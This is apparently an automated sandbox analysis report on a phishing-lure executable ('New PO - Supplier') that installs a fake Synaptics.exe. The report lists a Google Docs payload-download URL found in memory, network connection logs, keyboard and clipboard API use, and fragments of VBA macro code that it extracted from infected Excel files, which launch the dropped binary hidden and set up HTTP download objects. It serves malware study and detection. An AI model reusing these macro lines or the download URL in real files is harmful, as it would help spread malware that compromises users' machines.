                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd1
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtedCo
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtfor
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniS
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtr
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtsq
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtta
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadty-P
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduc
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducati
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00EF7099
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00EF7294
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_000C7294
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00EE4342
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00F0F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_000DF5D0

                                System Summary

                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00EA29C2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F102AA NtdllDialogWndProc_W,1_2_00F102AA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0E769 NtdllDialogWndProc_W,CallWindowProcW,1_2_00F0E769
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0EA4E NtdllDialogWndProc_W,1_2_00F0EA4E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_00F0ECBC
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAC99 NtdllDialogWndProc_W,1_2_00EBAC99
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,1_2_00EBAD5C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_00F0EFA8
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAFB4 GetParent,NtdllDialogWndProc_W,1_2_00EBAFB4
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F0A1 SendMessageW,NtdllDialogWndProc_W,1_2_00F0F0A1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_00F0F122
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F3DA NtdllDialogWndProc_W,1_2_00F0F3DA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F3AB NtdllDialogWndProc_W,1_2_00F0F3AB
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F37C NtdllDialogWndProc_W,1_2_00F0F37C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F45A ClientToScreen,NtdllDialogWndProc_W,1_2_00F0F45A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F425 NtdllDialogWndProc_W,1_2_00F0F425
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00F0F5D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F594 GetWindowLongW,NtdllDialogWndProc_W,1_2_00F0F594
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBB7F2 NtdllDialogWndProc_W,1_2_00EBB7F2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBB845 NtdllDialogWndProc_W,1_2_00EBB845
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FE80 NtdllDialogWndProc_W,1_2_00F0FE80
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,1_2_00F0FF91
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,1_2_00F0FF04
